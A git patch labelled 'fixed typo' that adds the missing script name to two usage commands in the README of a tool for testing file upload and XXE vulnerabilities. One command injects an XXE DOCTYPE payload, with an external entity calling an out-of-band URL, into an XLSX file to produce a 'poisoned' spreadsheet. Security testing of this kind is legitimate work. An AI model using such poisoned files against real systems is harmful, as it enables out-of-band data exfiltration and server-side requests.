From 106c5090e5eb320d3854ed73ee1e66e30b24a917 Mon Sep 17 00:00:00 2001 From: man3kin3ko Date: Tue, 24 Dec 2024 18:55:50 +0300 Subject: [PATCH] fixed typo --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 048c31a..185fe07 100644 --- a/README.md +++ b/README.md @@ -15,10 +15,10 @@ This tool is designed to test for file upload and XXE (XML External Entity) vuln Poison .XLSX file ☣️ ``` -python3 --file test.xlsx --xxe "<\!DOCTYPE ShiftSecurityConsulting [ <\!ENTITY xxe SYSTEM 'http://out-of-band.url'> ]>" --output poisoned.xlsx +python3 XXElixir.py --file test.xlsx --xxe "<\!DOCTYPE ShiftSecurityConsulting [ <\!ENTITY xxe SYSTEM 'http://out-of-band.url'> ]>" --output poisoned.xlsx ``` ``` -python3 --file test.xlsx --url https://shiftsecurityconsulting.com --output poisoned.xlsx +python3 XXElixir.py --file test.xlsx --url https://shiftsecurityconsulting.com --output poisoned.xlsx ``` ## Running from Docker 🐳